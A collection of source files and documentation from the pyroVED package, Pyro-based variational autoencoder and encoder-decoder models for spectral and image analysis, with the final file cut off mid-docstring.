[ { "alpha_fraction": 0.5253675580024719, "alphanum_fraction": 0.532926082611084, "avg_line_length": 33.74100875854492, "blob_id": "d090c05affe614a078b2882581fe807c71662c10", "content_id": "36cea84a65d6f982018f2b97607b9dc098618123", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9658, "license_type": "permissive", "max_line_length": 82, "num_lines": 278, "path": "/pyroved/nets/conv.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nconv.py\n=========\n\nConvolutional NN modules and custom blocks\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Union, Tuple, List\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..utils import get_activation, get_bnorm, get_conv, get_maxpool\n\nfrom warnings import warn, filterwarnings\n\nfilterwarnings(\"ignore\", module=\"torch.nn.functional\")\n\ntt = torch.tensor\n\n\nclass convEncoderNet(nn.Module):\n \"\"\"\n Standard convolutional encoder\n \"\"\"\n def __init__(self,\n input_dim: Tuple[int],\n input_channels: int = 1,\n latent_dim: int = 2,\n layers_per_block: List[int] = None,\n hidden_dim: int = 32,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n softplus_out: bool = True,\n pool: bool = True,\n ) -> None:\n \"\"\"\n Initializes encoder module\n \"\"\"\n super(convEncoderNet, self).__init__()\n if layers_per_block is None:\n layers_per_block = [1, 2, 2]\n output_dim = (tt(input_dim) // 2**len(layers_per_block)).tolist()\n output_channels = hidden_dim * len(layers_per_block)\n self.latent_dim = latent_dim\n self.feature_extractor = FeatureExtractor(\n len(input_dim), input_channels, layers_per_block, hidden_dim,\n batchnorm, activation, pool)\n self.features2latent = features_to_latent(\n [output_channels, *output_dim], 2*latent_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.feature_extractor(x)\n encoded = self.features2latent(x)\n mu, sigma = encoded.split(self.latent_dim, 1)\n sigma = self.activation_out(sigma)\n return mu, sigma\n\n\nclass convDecoderNet(nn.Module):\n \"\"\"\n Standard convolutional decoder\n \"\"\"\n def __init__(self,\n latent_dim: int,\n output_dim: int,\n output_channels: int = 1,\n layers_per_block: List[int] = None,\n hidden_dim: int = 96,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n sigmoid_out: bool = True,\n upsampling_mode: str = \"bilinear\",\n ) -> None:\n \"\"\"\n Initializes decoder module\n \"\"\"\n super(convDecoderNet, self).__init__()\n if layers_per_block is None:\n layers_per_block = [2, 2, 1]\n input_dim = (tt(output_dim) // 2**len(layers_per_block)).tolist()\n self.latent2features = latent_to_features(\n latent_dim, [hidden_dim, *input_dim])\n self.upsampler = Upsampler(\n len(output_dim), hidden_dim, layers_per_block, output_channels,\n batchnorm, activation, upsampling_mode)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.latent2features(x)\n x = self.activation_out(self.upsampler(x))\n return x\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Creates a block of layers each consisting of convolution operation,\n (optional) nonlinear activation and (optional) batch normalization\n \"\"\"\n def __init__(self,\n ndim: int,\n nlayers: int,\n input_channels: int,\n output_channels: int,\n kernel_size: Union[Tuple[int], int] = 3,\n stride: Union[Tuple[int], int] = 1,\n padding: Union[Tuple[int], int] = 1,\n batchnorm: bool = False,\n activation: str = \"lrelu\",\n pool: bool = False,\n ) -> None:\n \"\"\"\n Initializes module parameters\n \"\"\"\n super(ConvBlock, self).__init__()\n if not 0 < ndim < 4:\n raise AssertionError(\"ndim must be equal to 1, 2 or 3\")\n activation = get_activation(activation)\n block = []\n for i in range(nlayers):\n input_channels = output_channels if i > 0 else input_channels\n block.append(get_conv(ndim)(input_channels, output_channels,\n kernel_size=kernel_size, stride=stride, padding=padding))\n if activation is not None:\n block.append(activation())\n if batchnorm:\n block.append(get_bnorm(ndim)(output_channels))\n if pool:\n block.append(get_maxpool(ndim)(2, 2))\n self.block = nn.Sequential(*block)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Defines a forward pass\n \"\"\"\n output = self.block(x)\n return output\n\n\nclass UpsampleBlock(nn.Module):\n \"\"\"\n Upsampling performed using bilinear or nearest-neigbor interpolation\n followed by 1-by-1 convolution, which an be used to reduce a number of\n feature channels\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int,\n output_channels: int,\n scale_factor: int = 2,\n mode: str = \"bilinear\") -> None:\n \"\"\"\n Initializes module parameters\n \"\"\"\n super(UpsampleBlock, self).__init__()\n warn_msg = (\"'bilinear' mode is not supported for 1D and 3D;\" +\n \" switching to 'nearest' mode\")\n if mode not in (\"bilinear\", \"nearest\"):\n raise NotImplementedError(\n \"Use 'bilinear' or 'nearest' for upsampling mode\")\n if not 0 < ndim < 4:\n raise AssertionError(\"ndim must be equal to 1, 2 or 3\")\n if mode == \"bilinear\" and ndim in (3, 1):\n warn(warn_msg, category=UserWarning)\n mode = \"nearest\"\n self.mode = mode\n self.scale_factor = scale_factor\n self.conv = get_conv(ndim)(\n input_channels, output_channels,\n kernel_size=1, stride=1, padding=0)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Defines a forward pass\n \"\"\"\n x = F.interpolate(\n x, scale_factor=self.scale_factor, mode=self.mode)\n return self.conv(x)\n\n\nclass FeatureExtractor(nn.Sequential):\n \"\"\"\n Convolutional feature extractor\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int = 1,\n layers_per_block: List[int] = None,\n nfilters: int = 32,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n pool: bool = True,\n ) -> None:\n \"\"\"\n Initializes feature extractor module\n \"\"\"\n super(FeatureExtractor, self).__init__()\n if layers_per_block is None:\n layers_per_block = [1, 2, 2]\n for i, layers in enumerate(layers_per_block):\n in_filters = input_channels if i == 0 else nfilters * i\n block = ConvBlock(ndim, layers, in_filters, nfilters * (i+1),\n batchnorm=batchnorm, activation=activation,\n pool=pool)\n self.add_module(\"c{}\".format(i), block)\n\n\nclass Upsampler(nn.Sequential):\n \"\"\"\n Convolutional upsampler\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int = 96,\n layers_per_block: List[int] = None,\n output_channels: int = 1,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n upsampling_mode: str = \"bilinear\",\n ) -> None:\n \"\"\"\n Initializes upsampler module\n \"\"\"\n super(Upsampler, self).__init__()\n if layers_per_block is None:\n layers_per_block = [2, 2, 1]\n\n nfilters = input_channels\n for i, layers in enumerate(layers_per_block):\n in_filters = nfilters if i == 0 else nfilters // i\n block = ConvBlock(ndim, layers, in_filters, nfilters // (i+1),\n batchnorm=batchnorm, activation=activation,\n pool=False)\n self.add_module(\"conv_block_{}\".format(i), block)\n up = UpsampleBlock(ndim, nfilters // (i+1), nfilters // (i+1),\n mode=upsampling_mode)\n self.add_module(\"up_{}\".format(i), up)\n\n out = ConvBlock(ndim, 1, nfilters // (i+1), output_channels,\n 1, 1, 0, activation=None)\n self.add_module(\"output_layer\", out)\n\n\nclass features_to_latent(nn.Module):\n \"\"\"\n Maps features (usually, from a convolutional net/layer) to latent space\n \"\"\"\n def __init__(self, input_dim: Tuple[int], latent_dim: int = 2) -> None:\n super(features_to_latent, self).__init__()\n self.reshape_ = torch.prod(tt(input_dim))\n self.fc_latent = nn.Linear(self.reshape_, latent_dim)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = x.view(-1, self.reshape_)\n return self.fc_latent(x)\n\n\nclass latent_to_features(nn.Module):\n \"\"\"\n Maps latent vector to feature space\n \"\"\"\n def __init__(self, latent_dim: int, out_dim: Tuple[int]) -> None:\n super(latent_to_features, self).__init__()\n self.reshape_ = out_dim\n self.fc = nn.Linear(latent_dim, torch.prod(tt(out_dim)).item())\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.fc(x)\n return x.view(-1, *self.reshape_)\n" }, { "alpha_fraction": 0.7075098752975464, "alphanum_fraction": 0.7075098752975464, "avg_line_length": 24.299999237060547, "blob_id": "e3d70b8859aaf533ea30b60199a2ac132893e7d6", "content_id": "130f9b59be16314e6b2e09b2d5ecaa952d89e182", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "permissive", "max_line_length": 59, "num_lines": 10, "path": "/pyroved/models/__init__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nVariational autoencoder and encoder-decoder models\n\"\"\"\nfrom .ivae import iVAE\nfrom .ssivae import ssiVAE\nfrom .ss_reg_ivae import ss_reg_iVAE\nfrom .jivae import jiVAE\nfrom .ved import VED\n\n__all__ = ['iVAE', 'jiVAE', 'ssiVAE', 'ss_reg_iVAE', 'VED']\n" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 16, "blob_id": "6f890992dece126569e26cfccf1444170e8bf4c8", "content_id": "5546a623f20a6c10c25900a2f96b7186416e4408", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17, "license_type": "permissive", "max_line_length": 16, "num_lines": 1, "path": "/pyroved/__version__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "version= '0.2.3'\n" }, { "alpha_fraction": 0.5444698333740234, "alphanum_fraction": 0.5520520210266113, "avg_line_length": 36.09375, "blob_id": "cdf7ee55b1abcdde0583255ab516069b2e7d423d", "content_id": "87227ca6a15059eed8617e574a2e0705f2e6dfdd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8309, "license_type": "permissive", "max_line_length": 96, "num_lines": 224, "path": "/pyroved/trainers/auxsvi.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Type, Optional, Union, Dict\n\nfrom collections import OrderedDict\nfrom copy import deepcopy as dc\n\nimport torch\nimport torch.nn as nn\nimport pyro\nimport pyro.infer as infer\nimport pyro.optim as optim\n\nfrom ..utils import set_deterministic_mode, average_weights\n\n\nclass auxSVItrainer:\n \"\"\"\n Stochastic variational inference (SVI) trainer for variational models\n with auxillary losses\n\n Args:\n model:\n Initialized model. Must be a subclass of torch.nn.Module\n and have self.model and self.guide methods\n optimizer:\n Pyro optimizer (Defaults to Adam with learning rate 5e-4)\n seed:\n Enforces reproducibility\n\n Keyword Args:\n lr: learning rate (Default: 5e-4)\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n\n Examples:\n\n >>> # Initialize model for semi supervised learning\n >>> data_dim = (28, 28)\n >>> ssvae = pyroved.models.ssiVAE(data_dim, latent_dim=2, num_classes=10, invariances=['r'])\n >>> # Initialize SVI trainer for models with auxiliary loss terms\n >>> trainer = auxSVItrainer(ssvae)\n >>> # Train for 200 epochs:\n >>> for _ in range(200):\n >>> trainer.step(loader_unsuperv, loader_superv, loader_valid)\n >>> trainer.print_statistics()\n \"\"\"\n\n def __init__(self,\n model: Type[nn.Module],\n task: str = \"classification\",\n optimizer: Type[optim.PyroOptim] = None,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes trainer parameters\n \"\"\"\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n if task not in [\"classification\", \"regression\"]:\n raise ValueError(\"Choose between 'classification' and 'regression' tasks\")\n self.task = task\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n if optimizer is None:\n lr = kwargs.get(\"lr\", 5e-4)\n optimizer = optim.Adam({\"lr\": lr})\n if self.task == \"classification\":\n guide = infer.config_enumerate(\n model.guide, \"parallel\", expand=True)\n loss = pyro.infer.TraceEnum_ELBO(\n max_plate_nesting=1, strict_enumeration_warning=False)\n else:\n guide = model.guide\n loss = pyro.infer.Trace_ELBO()\n \n self.loss_basic = infer.SVI(\n model.model, guide, optimizer, loss=loss)\n self.loss_aux = infer.SVI(\n model.model_aux, model.guide_aux,\n optimizer, loss=pyro.infer.Trace_ELBO())\n self.model = model\n\n self.history = {\"training_loss\": [], \"test\": []}\n self.current_epoch = 0\n self.running_weights = {}\n\n def compute_loss(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> float:\n \"\"\"\n Computes basic and auxillary losses\n \"\"\"\n xs = xs.to(self.device)\n if ys is not None:\n ys = ys.to(self.device)\n loss = self.loss_basic.step(xs, ys, **kwargs)\n loss_aux = self.loss_aux.step(xs, ys, **kwargs)\n return loss + loss_aux\n\n def train(self,\n loader_unsup: Type[torch.utils.data.DataLoader],\n loader_sup: Type[torch.utils.data.DataLoader],\n **kwargs: float\n ) -> float:\n \"\"\"\n Train a single epoch\n \"\"\"\n # Get info on number of supervised and unsupervised batches\n sup_batches = len(loader_sup)\n unsup_batches = len(loader_unsup)\n p = (sup_batches + unsup_batches) // sup_batches\n\n loader_sup = iter(loader_sup)\n epoch_loss = 0.\n unsup_count = 0\n for i, (xs,) in enumerate(loader_unsup):\n # Compute and store loss for unsupervised part\n epoch_loss += self.compute_loss(xs, **kwargs)\n unsup_count += xs.shape[0]\n if i % p == 1:\n # sample random batches xs and ys\n xs, ys = loader_sup.next()\n # Compute supervised loss\n _ = self.compute_loss(xs, ys, **kwargs)\n\n return epoch_loss / unsup_count\n\n def evaluate(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n \"\"\"\n Evaluates model's current state on labeled test data\n \"\"\"\n if self.task == \"classification\":\n return self.evaluate_cls(loader_val)\n return self.evaluate_reg(loader_val)\n\n def evaluate_cls(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n correct, total = 0, 0\n with torch.no_grad():\n for data, labels in loader_val:\n predicted = self.model.classifier(data)\n _, lab_idx = torch.max(labels.cpu(), 1)\n correct += (predicted == lab_idx).sum().item()\n total += data.size(0)\n return correct / total\n\n def evaluate_reg(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n correct = 0\n with torch.no_grad():\n for data, gt in loader_val:\n predicted = self.model.regressor(data)\n mse = nn.functional.mse_loss(predicted, gt)\n correct += mse\n return correct\n\n def step(self,\n loader_unsup: torch.utils.data.DataLoader,\n loader_sup: torch.utils.data.DataLoader,\n loader_val: Optional[torch.utils.data.DataLoader] = None,\n **kwargs: float\n ) -> None:\n \"\"\"\n Single train (and evaluation, if any) step.\n\n Args:\n loader_unsup:\n Pytorch's dataloader with unlabeled training data\n loader_sup:\n Pytorch's dataloader with labeled training data\n loader_val:\n Pytorch's dataloader with validation data\n **scale_factor:\n Scale factor for KL divergence. See e.g. https://arxiv.org/abs/1804.03599\n Default value is 1 (i.e. no scaling)\n **aux_loss_multiplier:\n Hyperparameter that modulates the importance of the auxiliary loss\n term. See Eq. 9 in https://arxiv.org/abs/1406.5298. Default values is 20.\n \"\"\"\n train_loss = self.train(loader_unsup, loader_sup, **kwargs)\n self.history[\"training_loss\"].append(train_loss)\n if loader_val is not None:\n eval_acc = self.evaluate(loader_val)\n self.history[\"test\"].append(eval_acc)\n self.current_epoch += 1\n\n def save_running_weights(self, net: str) -> None:\n \"\"\"\n Saves the running weights of specified neural net (e.g. \"encoder_y\")\n Usually meant for a classifier neural network\n \"\"\"\n net = getattr(self.model, net)\n state_dict_ = OrderedDict()\n for k, v in net.state_dict().items():\n state_dict_[k] = dc(v).cpu()\n self.running_weights[self.current_epoch] = state_dict_\n\n def average_weights(self,\n net: str\n ) -> Dict[int, Dict[str, torch.Tensor]]:\n \"\"\"\n Updates the selected neural net with an averaged weights\n \"\"\"\n net = getattr(self.model, net)\n net.load_state_dict(average_weights(self.running_weights))\n\n def print_statistics(self) -> None:\n \"\"\"\n Print training and test (if any) losses for current epoch\n \"\"\"\n e = self.current_epoch\n if len(self.history[\"test\"]) > 0:\n if self.task == \"classification\":\n template = 'Epoch: {} Training loss: {:.4f}, Test accuracy: {:.4f}'\n else:\n template = 'Epoch: {} Training loss: {:.4f}, Test MSE: {:.4f}'\n print(template.format(e, self.history[\"training_loss\"][-1],\n self.history[\"test\"][-1]))\n else:\n template = 'Epoch: {} Training loss: {:.4f}'\n print(template.format(e, self.history[\"training_loss\"][-1]))\n" }, { "alpha_fraction": 0.5685320496559143, "alphanum_fraction": 0.5685320496559143, "avg_line_length": 25.23404312133789, "blob_id": "af6a59c8dcaf5e511435dc3de63663263559dd89", "content_id": "8fcc9c23f475f85c8ecff662891242a670437699", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 66, "num_lines": 47, "path": "/docs/source/models.rst", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "pyroVED models\n==============\n\nInvariant Variational Autoencoder\n----------------------------------\n.. autoclass:: pyroved.models.iVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nJoint Invariant Variational Autoencoder\n---------------------------------------\n.. autoclass:: pyroved.models.jiVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nSemi-Supervised Invariant Variational Autoencoder (Classification)\n------------------------------------------------------------------\n.. autoclass:: pyroved.models.ssiVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n \nSemi-Supervised Invariant Variational Autoencoder (Regression)\n--------------------------------------------------------------\n.. autoclass:: pyroved.models.ss_reg_iVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nVariational Encoder-Decoder\n---------------------------\n.. autoclass:: pyroved.models.VED\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n" }, { "alpha_fraction": 0.7674232125282288, "alphanum_fraction": 0.7719626426696777, "avg_line_length": 51.74647903442383, "blob_id": "3aa3ff37c63253baa6c293906127e755f026b080", "content_id": "1138b76398eec66caf8e8bc9073971e6362c3aeb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3745, "license_type": "permissive", "max_line_length": 450, "num_lines": 71, "path": "/README.md", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "# pyroVED\n\n---\n[![build](https://github.com/ziatdinovmax/pyroVED/actions/workflows/actions.yml/badge.svg)](https://github.com/ziatdinovmax/pyroVED/actions/workflows/actions.yml)\n[![codecov](https://codecov.io/gh/ziatdinovmax/pyroVED/branch/main/graph/badge.svg?token=FFA8XB0FED)](https://codecov.io/gh/ziatdinovmax/pyroVED)\n[![Documentation Status](https://readthedocs.org/projects/pyroved/badge/?version=latest)](https://pyroved.readthedocs.io/en/latest/README.html)\n[![PyPI version](https://badge.fury.io/py/pyroved.svg)](https://badge.fury.io/py/pyroved)\n\npyroVED is an open-source package built on top of the Pyro probabilistic programming framework for applications of variational encoder-decoder models in spectral and image analyses. The currently available models include variational autoencoders with translational, rotational, and scale invariances for unsupervised, class-conditioned, and semi-supervised learning, as well as *im2spec*-type models for predicting spectra from images and vice versa.\nMore models to come!\n\n<p align=\"center\">\n <img src=\"misc/mnist.png\" width=\"95%\" title=\"pyroved_ivae\">\n<p align=\"justify\">\n\n## Documentation and Examples\n\nThe documentation of the package content can be found [here](https://pyroved.readthedocs.io/).\n \nThe easiest way to start using pyroVED is via [Google Colab](https://colab.research.google.com/notebooks/intro.ipynb), which is a free research tool from Google for machine learning education and research built on top of Jupyter Notebook. The following notebooks can be executed in Google Colab by simply clicking on the \"Open in Colab\" icon:\n\n* Mastering the 1D shifts in spectral data [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/master/examples/shiftVAE.ipynb)\n\n* Disentangling image content from rotations [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/master/examples/rVAE.ipynb)\n\n* Learning (jointly) discrete and continuous representations of data [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/jrVAE.ipynb)\n\n* Semi-supervised learning from data with orientational disorder [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/ssrVAE.ipynb)\n\n* im2spec: Predicting 1D spectra from 2D images [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/im2spec_VED.ipynb) \n\n## Installation\n\n#### Requirements\n* python >= 3.6\n* [pytorch](https://pytorch.org/) >= 1.8\n* [pyro-ppl](https://pyro.ai/) >= 1.6\n\nInstall pyroVED using pip:\n\n```bash\npip install pyroved\n```\n\n#### Latest (unstable) version\n\nTo upgrade to the latest (unstable) version, run\n\n```bash\npip install --upgrade git+https://github.com/ziatdinovmax/pyroved.git\n```\n\n## Reporting bugs\nIf you found a bug in the code or would like a specific feature to be added, please create a report/request [here](https://github.com/ziatdinovmax/pyroVED/issues/new/choose).\n \n \n## Development\n\nTo run the unit tests, you'll need to have a pytest framework installed:\n\n```bash\npython3 -m pip install pytest\n```\n\nThen run tests as:\n\n```bash\npytest tests\n```\n\nIf this is your first time contributing to an open-source project, we highly recommend starting by familiarizing yourself with these very nice and detailed contribution [guidelines](https://github.com/firstcontributions/first-contributions).\n" }, { "alpha_fraction": 0.5505274534225464, "alphanum_fraction": 0.5578657984733582, "avg_line_length": 34.16666793823242, "blob_id": "fae422fde5f52b83eaf98b11477576183f1dad4c", "content_id": "ac0339d297e6c674da7e3fd73dc92e9c4955dad9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6541, "license_type": "permissive", "max_line_length": 78, "num_lines": 186, "path": "/pyroved/models/base.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nbase.py\n=========\n\nVariational encoder-decoder base class\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\n\nfrom typing import Tuple, Type, Union, List\nfrom abc import abstractmethod\n\nimport torch\nimport torch.nn as nn\n\nfrom ..utils import init_dataloader, transform_coordinates, generate_grid\n\ntt = torch.tensor\n\n\nclass baseVAE(nn.Module):\n \"\"\"Base class for regular and invriant variational encoder-decoder models.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (height x width) for images\n or (length,) for spectra.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n \"\"\"\n def __init__(self, *args, **kwargs: str):\n super(baseVAE, self).__init__()\n data_dim, invariances = args\n # Set device\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n # Set dimensionality\n self.ndim = len(data_dim)\n # Set invariances to enforce (number and type)\n if invariances is None:\n coord = 0\n else:\n coord = len(invariances)\n if self.ndim == 1:\n if coord > 1 or invariances[0] != 't':\n raise ValueError(\n \"For 1D data, the only invariance to enforce \"\n \"is translation ('t')\")\n if 't' in invariances and self.ndim == 2:\n coord = coord + 1\n self.coord = coord\n self.invariances = invariances\n # Set coordiante grid\n if self.coord > 0:\n self.grid = generate_grid(data_dim).to(self.device)\n # Prior \"belief\" about the degree of translational disorder\n if self.coord > 0 and 't' in self.invariances:\n dx_pri = tt(kwargs.get(\"dx_prior\", 0.1))\n dy_pri = kwargs.get(\"dy_prior\", dx_pri.clone())\n self.t_prior = (tt([dx_pri, dy_pri]) if self.ndim == 2\n else dx_pri).to(self.device)\n # Prior \"belief\" about the degree of scale disorder\n if self.coord > 0 and 's' in self.invariances:\n self.sc_prior = tt(kwargs.get(\"sc_prior\", 0.1)).to(self.device)\n # Encoder and decoder (None by default)\n self.encoder_z = None\n self.decoder = None\n\n @abstractmethod\n def model(self, *args, **kwargs):\n \"\"\"Pyro's model\"\"\"\n\n raise NotImplementedError\n\n @abstractmethod\n def guide(self, *args, **kwargs):\n \"\"\"Pyro's guide\"\"\"\n\n raise NotImplementedError\n\n def _split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent vector into parts associated with\n coordinate transformations and image content\n \"\"\"\n # For 1D, there is only a translation\n if self.ndim == 1:\n dx = z[:, 0:1]\n z = z[:, 1:]\n return None, dx, None, z\n phi = tt(0).to(self.device)\n dx = tt(0).to(self.device)\n sc = tt(1).to(self.device)\n if 'r' in self.invariances:\n phi = z[:, 0]\n z = z[:, 1:]\n if 't' in self.invariances:\n dx = z[:, :2]\n z = z[:, 2:]\n if 's' in self.invariances:\n sc = sc + self.sc_prior * z[:, 0]\n z = z[:, 1:]\n return phi, dx, sc, z\n\n def _encode(\n self,\n *input_args: Tuple[Union[torch.Tensor, List[torch.Tensor]]],\n **kwargs: int\n ) -> torch.Tensor:\n \"\"\"Encodes data using a trained inference (encoder) network\n in a batch-by-batch fashion.\"\"\"\n\n def inference(x: Tuple[torch.Tensor]) -> torch.Tensor:\n x = torch.cat(x, -1).to(self.device)\n with torch.no_grad():\n encoded = self.encoder_z(x)\n encoded = torch.cat(encoded, -1).cpu()\n return encoded\n\n loader = init_dataloader(*input_args, shuffle=False, **kwargs)\n z_encoded = []\n for x in loader:\n z_encoded.append(inference(x))\n return torch.cat(z_encoded)\n\n def _decode(self, z_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"Decodes latent coordinates in a batch-by-batch fashion.\"\"\"\n\n def generator(z: List[torch.Tensor]) -> torch.Tensor:\n with torch.no_grad():\n loc = self.decoder(*z)\n return loc.cpu()\n\n z_new = init_dataloader(z_new, shuffle=False, **kwargs)\n if self.invariances:\n grid = self.grid\n a = kwargs.get(\"angle\", tt(0.)).to(self.device)\n t = kwargs.get(\"shift\", tt(0.)).to(self.device)\n s = kwargs.get(\"scale\", tt(1.)).to(self.device)\n grid = transform_coordinates(\n grid.unsqueeze(0), a.unsqueeze(0),\n t.unsqueeze(0), s.unsqueeze(0))\n grid = grid.squeeze()\n x_decoded = []\n for z in z_new:\n if self.invariances:\n z = [grid.expand(z[0].shape[0], *grid.shape)] + z\n x_decoded.append(generator(z))\n return torch.cat(x_decoded)\n\n def set_encoder(self, encoder_net: Type[torch.nn.Module]) -> None:\n \"\"\"Sets a user-defined encoder neural network.\"\"\"\n\n self.encoder_z = encoder_net.to(self.device)\n\n def set_decoder(self, decoder_net: Type[torch.nn.Module]) -> None:\n \"\"\"Sets a user-defined decoder neural network.\"\"\"\n\n self.decoder = decoder_net.to(self.device)\n\n def save_weights(self, filepath: str) -> None:\n \"\"\"Saves trained weights of encoder(s) and decoder.\"\"\"\n\n torch.save(self.state_dict(), filepath + '.pt')\n\n def load_weights(self, filepath: str) -> None:\n \"\"\"Loads saved weights of encoder(s) and decoder.\"\"\"\n\n weights = torch.load(filepath, map_location=self.device)\n self.load_state_dict(weights)\n" }, { "alpha_fraction": 0.5626335144042969, "alphanum_fraction": 0.5684314966201782, "avg_line_length": 41.012821197509766, "blob_id": "f82d3a145eec617b1bd00c8a82b30fb39f1d4a42", "content_id": "b26df2aea0fb47e40877556d6b7c8394403630c1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13108, "license_type": "permissive", "max_line_length": 94, "num_lines": 312, "path": "/pyroved/models/jivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\njivae.py\n=========\n\nVariational autoencoder for learning (jointly) discrete and\ncontinuous latent representations of data with arbitrary affine transformations\n(rotations, translations, and scale)\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom ..nets import fcDecoderNet, jfcEncoderNet, sDecoderNet\nfrom ..utils import (generate_grid, generate_latent_grid,\n generate_latent_grid_traversal, get_sampler,\n plot_grid_traversal, plot_img_grid, plot_spect_grid,\n set_deterministic_mode, to_onehot, transform_coordinates)\nfrom .base import baseVAE\n\ntt = torch.tensor\n\n\nclass jiVAE(baseVAE):\n \"\"\"\n Variational autoencoder for learning (jointly) discrete and\n continuous latent representations of data while enforcing rotational,\n translational, and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of continuous latent dimensions.\n discrete_dim:\n Number of discrete latent dimensions.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference network).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator network).\n num_layers_e:\n Number of layers in encoder (inference network).\n num_layers_d:\n Number of layers in decoder (generator network).\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), 